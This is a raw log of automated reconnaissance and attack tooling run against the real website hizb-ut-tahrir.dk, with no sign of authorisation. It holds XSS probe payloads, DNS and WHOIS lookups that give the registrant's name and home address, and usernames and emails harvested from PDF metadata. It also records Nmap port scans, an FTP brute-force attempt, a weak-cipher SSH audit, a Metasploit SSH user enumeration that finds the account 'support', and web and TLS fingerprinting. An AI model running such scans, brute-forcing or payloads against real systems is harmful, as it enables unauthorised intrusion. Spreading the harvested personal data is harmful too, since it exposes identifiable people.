  597. + /index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >: MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  598. + /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  599. + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  600. + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  601. + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  602. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  603. + OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
  604. + OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
  605. + OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  606. + OSVDB-3092: /data/: This might be interesting...
  607. ---------------------------------------------------------------------------------------------------------------------------------------
  608. #######################################################################################################################################
  609. dnsenum VERSION:1.2.4
  610.  
  611. ----- hizb-ut-tahrir.dk -----
  612.  
  613.  
  614. Host's addresses:
  615. __________________
  616.  
  617. hizb-ut-tahrir.dk. 2324 IN A 93.191.156.145
  618.  
  619.  
  620. Wildcard detection using: ycmhfmdeiklk
  621. _______________________________________
  622.  
  623. ycmhfmdeiklk.hizb-ut-tahrir.dk. 3600 IN A 93.191.156.145
  624.  
  625.  
  626. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  627.  
  628. Wildcards detected, all subdomains will point to the same IP address
  629. Omitting results containing 93.191.156.145.
  630. Maybe you are using OpenDNS servers.
  631.  
  632. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  633.  
  634.  
  635. Name Servers:
  636. ______________
  637.  
  638. ns1.unoeuro.com. 85143 IN A 46.36.215.2
  639. ns4.unoeuro.com. 85142 IN A 85.159.211.233
  640. ns3.unoeuro.com. 85142 IN A 83.217.78.186
  641. ns2.unoeuro.com. 86366 IN A 93.191.156.2
  642.  
  643.  
  644. Mail (MX) Servers:
  645. ___________________
  646.  
  647. mx.unoeuro.com. 3600 IN A 94.231.103.108
  648.  
  649.  
  650. Trying Zone Transfers and getting Bind Versions:
  651. _________________________________________________
  652.  
  653.  
  654. Trying Zone Transfer for hizb-ut-tahrir.dk on ns1.unoeuro.com ...
  655.  
  656. Trying Zone Transfer for hizb-ut-tahrir.dk on ns4.unoeuro.com ...
  657.  
  658. Trying Zone Transfer for hizb-ut-tahrir.dk on ns3.unoeuro.com ...
  659.  
  660. Trying Zone Transfer for hizb-ut-tahrir.dk on ns2.unoeuro.com ...
  661.  
  662. brute force file not specified, bay.
  663. #######################################################################################################################################
  664. # Hello 2001:18c0:11e:f700:9995:4a3e:722e:4a93. Your session has been logged.
  665. #
  666. # Copyright (c) 2002 - 2019 by DK Hostmaster A/S
  667. #
  668. # Version: 2.0.2
  669. #
  670. # The data in the DK Whois database is provided by DK Hostmaster A/S
  671. # for information purposes only, and to assist persons in obtaining
  672. # information about or related to a domain name registration record.
  673. # We do not guarantee its accuracy. We will reserve the right to remove
  674. # access for entities abusing the data, without notice.
  675. #
  676. # Any use of this material to target advertising or similar activities
  677. # are explicitly forbidden and will be prosecuted. DK Hostmaster A/S
  678. # requests to be notified of any such activities or suspicions thereof.
  679.  
  680. Domain: hizb-ut-tahrir.dk
  681. DNS: hizb-ut-tahrir.dk
  682. Registered: 1999-08-05
  683. Expires: 2019-09-30
  684. Registration period: 1 year
  685. VID: no
  686. Dnssec: Unsigned delegation
  687. Status: Active
  688.  
  689. Registrant
  690. Handle: MJ7736-DK
  691. Name: Mulie Langberg Jaw
  692. Address: Tømrergade 6,1 tv
  693. Postalcode: 2200
  694. City: København N
  695. Country: DK
  696.  
  697. Administrator
  698. Handle: MJ7736-DK
  699. Name: Mulie Langberg Jaw
  700. Address: Tømrergade 6,1 tv
  701. Postalcode: 2200
  702. City: København N
  703. Country: DK
  704.  
  705. Nameservers
  706. Hostname: ns1.unoeuro.com
  707. Handle: UA1074-DK
  708. Hostname: ns2.unoeuro.com
  709. Handle: UA1074-DK
  710. Hostname: ns3.unoeuro.com
  711. Handle: UA1074-DK
  712. Hostname: ns4.unoeuro.com
  713. Handle: UA1074-DK
  714. #######################################################################################################################################
  715. ---------------------------------------------------------------------------------------------------------------------------------------
  716.  
  717. [1/25] /webhp?hl=en-CA
  718. [x] Error downloading /webhp?hl=en-CA
  719. [2/25] https://www.hizb-ut-tahrir.dk/data/loebesedler/20100802_LS_Tajikistan.pdf
  720. [3/25] http://www.hizb-ut-tahrir.dk/data/books/aendring.pdf
  721. [4/25] http://www.hizb-ut-tahrir.dk/data/books/takattul.pdf
  722. [x] Error in PDF metadata Creator
  723. [5/25] https://www.hizb-ut-tahrir.dk/data/presse/20110317_PM_Integrationsministeren.pdf
  724. [6/25] http://www.hizb-ut-tahrir.dk/data/books/ForfatningsudkastKhilafah.pdf
  725. [7/25] https://www.hizb-ut-tahrir.dk/data/loebesedler/20110225_Libyen.pdf
  726. [8/25] https://www.hizb-ut-tahrir.dk/data/presse/OslosTragedie.pdf
  727. [9/25] http://www.hizb-ut-tahrir.dk/data/books/PolitiskDeltagelse.pdf
  728. [x] Error in PDF metadata Creator
  729. [10/25] http://www.hizb-ut-tahrir.dk/data/books/terrorismemag.pdf
  730. [11/25] http://www.hizb-ut-tahrir.dk/data/books/Mafahim.pdf
  731. [x] Error in PDF metadata Creator
  732. [12/25] http://www.hizb-ut-tahrir.dk/data/books/Miljoeproblemet.pdf
  733. [13/25] http://hizb-ut-tahrir.dk/data/books/Torklaedehaefte.pdf
  734. [14/25] http://www.hizb-ut-tahrir.dk/data/books/Kalifatetsstatsinstitutioner.pdf
  735. [15/25] http://www.hizb-ut-tahrir.dk/data/books/muslimernesrolleivesten.pdf
  736. [16/25] http://www.hizb-ut-tahrir.dk/data/books/islamiskpsyke.pdf
  737. [17/25] https://hizb-ut-tahrir.dk/data/qa/20120116_qa_iran.pdf
  738. [18/25] http://www.hizb-ut-tahrir.dk/data/presse/20120425_PM_Palaestina.pdf
  739. [19/25] https://www.hizb-ut-tahrir.dk/data/loebesedler/Denrussiskesikkerhedstjenestesanarkistiskepraksis.pdf
  740. [20/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/USA_manipulerer_med_Selvstyret_i_direkte_og_indirekte_forhandlinger.pdf
  741. [21/25] https://www.hizb-ut-tahrir.dk/data/presse/20110429_PM_DelegationTilSyriensAmbassade.pdf
  742. [22/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/20110520_LS_Obama.pdf
  743. [23/25] http://www.hizb-ut-tahrir.dk/data/books/system.pdf
  744. [x] Error in PDF metadata Creator
  745. [24/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/29012010_tagdavedlaereiderkanse.pdf
  746. [25/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/20100901_LS_IrakTilbagetraekning.pdf
  747. ---------------------------------------------------------------------------------------------------------------------------------------
  748.  
  749. [+] List of users found:
  750. ---------------------------------------------------------------------------------------------------------------------------------------
  751. OEM
  752. Maryam
  753. Jana
  754. k
  755. OKOADM
  756. khilafah.dk
  757. pc
  758. Hizb ut-Tahrir Skandinavien
  759. Callshop Admin
  760. A
  761. Navid
  762. PC
  763.  
  764. [+] List of software found:
  765. ---------------------------------------------------------------------------------------------------------------------------------------
  766. Microsoft Office Word
  767. ��Microsoft� Office Word 2007
  768. Acrobat Distiller 5.0.5 (Windows)
  769. ��Microsoft� Word 2010
  770. Nitro PDF PrimoPDF
  771. PrimoPDF http://www.primopdf.com
  772. Adobe PDF Library 15.0
  773. Adobe InDesign CC 2015 (Windows)
  774. Acrobat Distiller 9.0.0 (Windows)
  775. PScript5.dll Version 5.2.2
  776. AFPL Ghostscript 8.54
  777. Acrobat Distiller 9.4.2 (Windows)
  778.  
  779. [+] List of paths and servers found:
  780. ---------------------------------------------------------------------------------------------------------------------------------------
  781. Normal.dot
  782.  
  783. [+] List of e-mails found:
  784. ---------------------------------------------------------------------------------------------------------------------------------------
  785. Chadi@hizb-ut-tahrir.dk
  786. info@hizb-ut-tahrir.dk
  787. info@hizb-ut-tahrir.dk
  788. Chadi@hizb-ut-tahrir.dk
  789. cf@hizb.dk
  790. info@hizb-ut-tahrir.dk
  791. Chadi@hizb-ut-tahrir.dk
  792. info@hizb-ut-tahrir.dk
  793. #######################################################################################################################################
  794. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:05 EST
  795. Warning: 93.191.156.145 giving up on port because retransmission cap hit (2).
  796. Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
  797. Host is up (0.50s latency).
  798. rDNS record for 93.191.156.145: linux260.unoeuro.com
  799. Not shown: 468 filtered ports, 3 closed ports
  800. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  801. PORT STATE SERVICE
  802. 21/tcp open ftp
  803. 22/tcp open ssh
  804. 80/tcp open http
  805. 443/tcp open https
  806. 8008/tcp open http
  807. #######################################################################################################################################
  808. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:08 EST
  809. Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
  810. Host is up (0.24s latency).
  811. rDNS record for 93.191.156.145: linux260.unoeuro.com
  812. Not shown: 2 filtered ports
  813. PORT STATE SERVICE
  814. 53/udp open|filtered domain
  815. 67/udp open|filtered dhcps
  816. 68/udp open|filtered dhcpc
  817. 69/udp open|filtered tftp
  818. 88/udp open|filtered kerberos-sec
  819. 123/udp open|filtered ntp
  820. 139/udp open|filtered netbios-ssn
  821. 161/udp open|filtered snmp
  822. 162/udp open|filtered snmptrap
  823. 389/udp open|filtered ldap
  824. 520/udp open|filtered route
  825. 2049/udp open|filtered nfs
  826. #######################################################################################################################################
  827. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:08 EST
  828. Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
  829. Host is up (0.47s latency).
  830. rDNS record for 93.191.156.145: linux260.unoeuro.com
  831.  
  832. PORT STATE SERVICE VERSION
  833. 21/tcp open ftp ProFTPD
  834. | ftp-brute:
  835. | Accounts: No valid accounts found
  836. |_ Statistics: Performed 1623 guesses in 181 seconds, average tps: 8.8
  837. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  838. Device type: general purpose|firewall|storage-misc
  839. Running (JUST GUESSING): Linux 2.6.X|3.X (90%), WatchGuard Fireware 11.X (90%), Synology DiskStation Manager 5.X (90%)
  840. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1
  841. Aggressive OS guesses: Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%), Linux 3.10 (90%), Linux 3.4 (90%), WatchGuard Fireware 11.8 (90%), Linux 3.1 - 3.2 (90%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  842. No exact OS matches for host (test conditions non-ideal).
  843. Network Distance: 12 hops
  844.  
  845. TRACEROUTE (using port 21/tcp)
  846. HOP RTT ADDRESS
  847. 1 233.00 ms 10.253.200.1
  848. 2 233.04 ms v106.ce02.hkg-10.hk.leaseweb.net (43.249.36.189)
  849. 3 233.04 ms xe-2-0-3.br01.hkg-10.hk.leaseweb.net (43.249.36.8)
  850. 4 233.61 ms xe-4-1-0.br01.hkg-12.hk.leaseweb.net (64.120.119.228)
  851. 5 234.82 ms 63-217-237-129.static.pccwglobal.net (63.217.237.129)
  852. 6 449.70 ms 63.223.54.30
  853. 7 444.87 ms ae20-0.ashbnqp2.us.ip.tdc.net (206.126.236.59)
  854. 8 512.55 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  855. 9 509.37 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  856. 10 507.69 ms 212.237.248.5
  857. 11 ...
  858. 12 507.23 ms linux260.unoeuro.com (93.191.156.145)
  859. #######################################################################################################################################
  860. # general
  861. (gen) banner: SSH-2.0-OpenSSH_5.3
  862. (gen) software: OpenSSH 5.3
  863. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
  864. (gen) compression: enabled (zlib@openssh.com)
  865.  
  866. # key exchange algorithms
  867. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  868. `- [info] available since OpenSSH 4.4
  869. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  870. `- [warn] using weak hashing algorithm
  871. `- [info] available since OpenSSH 2.3.0
  872. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  873. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  874. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  875. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  876. `- [warn] using small 1024-bit modulus
  877. `- [warn] using weak hashing algorithm
  878. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  879.  
  880. # host-key algorithms
  881. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  882. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  883. `- [warn] using small 1024-bit modulus
  884. `- [warn] using weak random number generator could reveal the key
  885. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  886.  
  887. # encryption algorithms (ciphers)
  888. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  889. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  890. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  891. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  892. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  893. `- [warn] using weak cipher
  894. `- [info] available since OpenSSH 4.2
  895. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  896. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  897. `- [warn] using weak cipher
  898. `- [info] available since OpenSSH 4.2
  899. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  900. `- [warn] using weak cipher mode
  901. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  902. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  903. `- [warn] using weak cipher
  904. `- [warn] using weak cipher mode
  905. `- [warn] using small 64-bit block size
  906. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  907. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  908. `- [fail] disabled since Dropbear SSH 0.53
  909. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  910. `- [warn] using weak cipher mode
  911. `- [warn] using small 64-bit block size
  912. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  913. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  914. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  915. `- [warn] using weak cipher mode
  916. `- [warn] using small 64-bit block size
  917. `- [info] available since OpenSSH 2.1.0
  918. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  919. `- [warn] using weak cipher mode
  920. `- [info] available since OpenSSH 2.3.0
  921. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  922. `- [warn] using weak cipher mode
  923. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  924. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  925. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  926. `- [warn] using weak cipher
  927. `- [info] available since OpenSSH 2.1.0
  928. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  929. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  930. `- [warn] using weak cipher mode
  931. `- [info] available since OpenSSH 2.3.0
  932.  
  933. # message authentication code algorithms
  934. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  935. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  936. `- [warn] using encrypt-and-MAC mode
  937. `- [warn] using weak hashing algorithm
  938. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  939. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  940. `- [warn] using weak hashing algorithm
  941. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  942. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  943. `- [warn] using small 64-bit tag size
  944. `- [info] available since OpenSSH 4.7
  945. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  946. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  947. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  948. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  949. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  950. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  951. `- [warn] using encrypt-and-MAC mode
  952. `- [info] available since OpenSSH 2.5.0
  953. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  954. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  955. `- [warn] using encrypt-and-MAC mode
  956. `- [info] available since OpenSSH 2.1.0
  957. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  958. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  959. `- [warn] using encrypt-and-MAC mode
  960. `- [warn] using weak hashing algorithm
  961. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  962. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  963. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  964. `- [warn] using encrypt-and-MAC mode
  965. `- [warn] using weak hashing algorithm
  966. `- [info] available since OpenSSH 2.5.0
  967.  
  968. # algorithm recommendations (for OpenSSH 5.3)
  969. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  970. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  971. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  972. (rec) -ssh-dss -- key algorithm to remove
  973. (rec) -arcfour -- enc algorithm to remove
  974. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  975. (rec) -blowfish-cbc -- enc algorithm to remove
  976. (rec) -3des-cbc -- enc algorithm to remove
  977. (rec) -aes256-cbc -- enc algorithm to remove
  978. (rec) -arcfour256 -- enc algorithm to remove
  979. (rec) -cast128-cbc -- enc algorithm to remove
  980. (rec) -aes192-cbc -- enc algorithm to remove
  981. (rec) -arcfour128 -- enc algorithm to remove
  982. (rec) -aes128-cbc -- enc algorithm to remove
  983. (rec) -hmac-md5-96 -- mac algorithm to remove
  984. (rec) -hmac-ripemd160 -- mac algorithm to remove
  985. (rec) -hmac-sha1-96 -- mac algorithm to remove
  986. (rec) -umac-64@openssh.com -- mac algorithm to remove
  987. (rec) -hmac-md5 -- mac algorithm to remove
  988. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  989. (rec) -hmac-sha1 -- mac algorithm to remove
  990. #######################################################################################################################################
  991. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:13 EST
  992. Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
  993. Host is up (0.18s latency).
  994. rDNS record for 93.191.156.145: linux260.unoeuro.com
  995.  
  996. PORT STATE SERVICE VERSION
  997. 22/tcp filtered ssh
  998. Too many fingerprints match this host to give specific OS details
  999. Network Distance: 11 hops
  1000.  
  1001. TRACEROUTE (using proto 1/icmp)
  1002. HOP RTT ADDRESS
  1003. 1 232.38 ms 10.253.200.1
  1004. 2 232.63 ms v106.ce01.hkg-10.hk.leaseweb.net (43.249.36.188)
  1005. 3 233.41 ms te-0-0-0-0.br02.hkg-10.hk.leaseweb.net (43.249.36.10)
  1006. 4 234.20 ms xe-5-1-0.br01.hkg-12.hk.leaseweb.net (64.120.119.226)
  1007. 5 234.65 ms 63-217-237-129.static.pccwglobal.net (63.217.237.129)
  1008. 6 447.75 ms 63.223.54.30
  1009. 7 442.95 ms ae20-0.ashbnqp2.us.ip.tdc.net (206.126.236.59)
  1010. 8 509.37 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  1011. 9 510.00 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  1012. 10 497.81 ms 212.237.248.7
  1013. 11 504.89 ms linux260.unoeuro.com (93.191.156.145)
  1014. #######################################################################################################################################
  1015. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  1016. RHOSTS => hizb-ut-tahrir.dk
  1017. RHOST => hizb-ut-tahrir.dk
  1018. [*] 93.191.156.145:22 - SSH - Using malformed packet technique
  1019. [*] 93.191.156.145:22 - SSH - Starting scan
  1020. [-] 93.191.156.145:22 - SSH - User 'admin' not found
  1021. [-] 93.191.156.145:22 - SSH - User 'administrator' not found
  1022. [-] 93.191.156.145:22 - SSH - User 'anonymous' not found
  1023. [-] 93.191.156.145:22 - SSH - User 'backup' not found
  1024. [-] 93.191.156.145:22 - SSH - User 'bee' not found
  1025. [-] 93.191.156.145:22 - SSH - User 'ftp' not found
  1026. [-] 93.191.156.145:22 - SSH - User 'guest' not found
  1027. [-] 93.191.156.145:22 - SSH - User 'GUEST' not found
  1028. [-] 93.191.156.145:22 - SSH - User 'info' not found
  1029. [-] 93.191.156.145:22 - SSH - User 'mail' not found
  1030. [-] 93.191.156.145:22 - SSH - User 'mailadmin' not found
  1031. [-] 93.191.156.145:22 - SSH - User 'msfadmin' not found
  1032. [-] 93.191.156.145:22 - SSH - User 'mysql' not found
  1033. [-] 93.191.156.145:22 - SSH - User 'nobody' not found
  1034. [-] 93.191.156.145:22 - SSH - User 'oracle' not found
  1035. [-] 93.191.156.145:22 - SSH - User 'owaspbwa' not found
  1036. [-] 93.191.156.145:22 - SSH - User 'postfix' not found
  1037. [-] 93.191.156.145:22 - SSH - User 'postgres' not found
  1038. [-] 93.191.156.145:22 - SSH - User 'private' not found
  1039. [-] 93.191.156.145:22 - SSH - User 'proftpd' not found
  1040. [-] 93.191.156.145:22 - SSH - User 'public' not found
  1041. [-] 93.191.156.145:22 - SSH - User 'root' not found
  1042. [-] 93.191.156.145:22 - SSH - User 'superadmin' not found
  1043. [+] 93.191.156.145:22 - SSH - User 'support' found
  1044. [-] 93.191.156.145:22 - SSH - User 'sys' not found
  1045. [-] 93.191.156.145:22 - SSH - User 'system' not found
  1046. [-] 93.191.156.145:22 - SSH - User 'systemadmin' not found
  1047. [-] 93.191.156.145:22 - SSH - User 'systemadministrator' not found
  1048. [-] 93.191.156.145:22 - SSH - User 'test' not found
  1049. [-] 93.191.156.145:22 - SSH - User 'tomcat' not found
  1050. [-] 93.191.156.145:22 - SSH - User 'user' not found
  1051. [-] 93.191.156.145:22 - SSH - User 'webmaster' not found
  1052. [-] 93.191.156.145:22 - SSH - User 'www-data' not found
  1053. [-] 93.191.156.145:22 - SSH - User 'Fortimanager_Access' not found
  1054. [*] Scanned 1 of 1 hosts (100% complete)
  1055. [*] Auxiliary module execution completed
  1056. #######################################################################################################################################
  1057.  
  1058. wig - WebApp Information Gatherer
  1059.  
  1060.  
  1061. Scanning http://hizb-ut-tahrir.dk...
  1062. _____________________ SITE INFO ______________________
  1063. IP Title
  1064. 93.191.156.145 403 Forbidden
  1065.  
  1066. ______________________ VERSION _______________________
  1067. Name Versions Type
  1068. Apache Platform
  1069.  
  1070. ____________________ INTERESTING _____________________
  1071. URL Note Type
  1072. /readme.html Readme file Interesting
  1073. /install.php Installation file Interesting
  1074. /test.php Test file Interesting
  1075.  
  1076. ______________________________________________________
  1077. Time: 91.6 sec Urls: 598 Fingerprints: 40401
  1078. #######################################################################################################################################
  1079. HTTP/1.1 403 Forbidden
  1080. Date: Wed, 30 Jan 2019 01:18:31 GMT
  1081. Server: Apache
  1082. Content-Type: text/html; charset=iso-8859-1
  1083.  
  1084. HTTP/1.1 403 Forbidden
  1085. Date: Wed, 30 Jan 2019 01:18:32 GMT
  1086. Server: Apache
  1087. Content-Type: text/html; charset=iso-8859-1
  1088. ######################################################################################################################################
  1089. wig - WebApp Information Gatherer
  1090.  
  1091.  
  1092. Scanning https://hizb-ut-tahrir.dk...
  1093. ______________________ SITE INFO ______________________
  1094. IP Title
  1095. 93.191.156.145 403 Forbidden
  1096.  
  1097. _______________________ VERSION _______________________
  1098. Name Versions Type
  1099. Apache Platform
  1100.  
  1101. _____________________ INTERESTING _____________________
  1102. URL Note Type
  1103. /readme.html Readme file Interesting
  1104. /install.php Installation file Interesting
  1105. /test.php Test file Interesting
  1106.  
  1107. _______________________________________________________
  1108. Time: 126.0 sec Urls: 599 Fingerprints: 40401
  1109. #######################################################################################################################################
  1110. HTTP/2 403
  1111. date: Wed, 30 Jan 2019 01:21:39 GMT
  1112. server: Apache
  1113. content-type: text/html; charset=iso-8859-1
  1114.  
  1115. HTTP/2 403
  1116. date: Wed, 30 Jan 2019 01:21:41 GMT
  1117. server: Apache
  1118. content-type: text/html; charset=iso-8859-1
  1119. #######################################################################################################################################
  1120. Version: 1.11.12-static
  1121. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1122.  
  1123. Connected to 93.191.156.145
  1124.  
  1125. Testing SSL server hizb-ut-tahrir.dk on port 443 using SNI name hizb-ut-tahrir.dk
  1126.  
  1127. TLS Fallback SCSV:
  1128. Server supports TLS Fallback SCSV
  1129.  
  1130. TLS renegotiation:
  1131. Secure session renegotiation supported
  1132.  
  1133. TLS Compression:
  1134. Compression disabled
  1135.  
  1136. Heartbleed:
  1137. TLS 1.2 not vulnerable to heartbleed
  1138. TLS 1.1 not vulnerable to heartbleed
  1139. TLS 1.0 not vulnerable to heartbleed
  1140.  
  1141. Supported Server Cipher(s):
  1142. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1143. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1144. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  1145. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  1146. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1147. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1148. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1149. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1150. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  1151. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1152. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  1153. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1154. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1155. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1156. Accepted TLSv1.2 128 bits AES128-SHA256
  1157. Accepted TLSv1.2 256 bits AES256-SHA256
  1158. Accepted TLSv1.2 128 bits AES128-SHA
  1159. Accepted TLSv1.2 256 bits AES256-SHA
  1160. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1161. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1162. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1163. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1164. Accepted TLSv1.1 128 bits AES128-SHA
  1165. Accepted TLSv1.1 256 bits AES256-SHA
  1166. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1167. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1168. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1169. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1170. Accepted TLSv1.0 128 bits AES128-SHA
